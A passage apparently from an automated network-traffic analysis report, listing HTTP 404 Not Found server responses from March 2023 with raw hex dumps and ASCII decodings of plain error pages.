69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:51 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:09:54 GMTServer: ApacheContent-Length: 16056Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:36 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 20 Mar 2023 08:10:41 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:46 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:49 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 20 Mar 2023 08:10:52 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 203Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 30 6f 71 71 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /0oqq/ was not found on this server.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 08:10:58 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Mon, 20 Mar 2023 08:11:00 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Mon, 20 Mar 2023 08:11:03 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 